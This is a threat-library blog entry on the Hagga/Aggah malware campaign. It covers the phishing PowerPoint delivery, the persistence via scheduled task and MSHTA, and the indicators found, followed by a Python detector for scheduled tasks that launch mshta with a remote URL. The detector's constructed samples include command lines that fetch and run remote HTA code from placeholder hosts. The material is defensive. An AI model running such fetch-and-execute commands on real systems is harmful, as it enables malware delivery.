Showing posts with label hagga. Show all posts

Thursday, April 29, 2021

Threat Library - Hagga / Aggah

Hagga / Aggah

date: 11/18/2020

delivery: email [Subject: Order-PO500-18, Attachment: .PPT PowerPoint that creates a scheduled task]

persistence: scheduled task "lunkicharkhi" that downloads a VBS script embedded in a blogspot URL (madarjaaatresearchers.blogspot[.com/p/thirdsaint3.html) and runs it with MSHTA

capabilities (per memory strings): unknown

c2s: unknown

special notes: PowerPoint; scheduled task that connects to a blogspot URL and runs VBS with MSHTA

samples: 

PPT - https://app.any.run/tasks/c896710d-c2e3-4bba-ba7a-cf801e9544cf/

VB Script - https://app.any.run/tasks/f6b585e9-e906-4882-942c-1bfb6cca666d/

links: 

https://twitter.com/neonprimetime/status/1330905903562940427
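
detection example (added here, not part of the original post or the analysed sample): a Python check that flags scheduled-task definitions whose action hands mshta a remote URL, the persistence pattern noted above. The task XML samples, sample names and URLs are constructed placeholders, and the function names are illustrative.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
MSHTA_RE = re.compile(r"(?:^|[\\/\s\"'])mshta(?:\.exe)?(?=$|[\s\"'])", re.IGNORECASE)

def remote_mshta_actions(task_xml):
    """Return (command line, URL) pairs for Exec actions that give mshta a remote URL."""
    root = ET.fromstring(task_xml)
    hits = []
    for action in root.findall("./t:Actions/t:Exec", NS):
        command = (action.findtext("t:Command", "", NS) or "").strip()
        arguments = (action.findtext("t:Arguments", "", NS) or "").strip()
        line = f"{command} {arguments}".strip()
        # mshta may be the command itself or be launched via cmd /c, so test the whole line
        if MSHTA_RE.search(line):
            for url in URL_RE.findall(line):
                hits.append((line, url))
    return hits

def _task(command, arguments):
    # Constructed sample in Task Scheduler XML layout (not taken from the analysed sample)
    return (f'<Task xmlns="{NS["t"]}"><Actions><Exec>'
            f"<Command>{command}</Command><Arguments>{arguments}</Arguments>"
            "</Exec></Actions></Task>")

SAMPLES = {
    "constructed-remote-mshta": _task("mshta", "https://example.blogspot.invalid/p/page.html"),
    "constructed-cmd-wrapper": _task("cmd.exe", "/c mshta.exe http://example.invalid/a.hta"),
    "constructed-local-hta": _task(r"C:\Windows\System32\mshta.exe", r"C:\Tools\inventory.hta"),
    "constructed-defrag": _task(r"%windir%\system32\defrag.exe", "-c -h -o"),
}

def flagged(samples=SAMPLES):
    """Map sample name -> hits, keeping only tasks with at least one hit."""
    results = {name: remote_mshta_actions(xml) for name, xml in samples.items()}
    return {name: hits for name, hits in results.items() if hits}

if __name__ == "__main__":
    for name, hits in flagged().items():
        print(name, hits)
```

The same function can be fed the task XML from the files under the Windows Tasks folder or from the task content recorded in task-creation events; pass UTF-16 exports as bytes so the parser honours their encoding declaration.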

---------------------------------------------------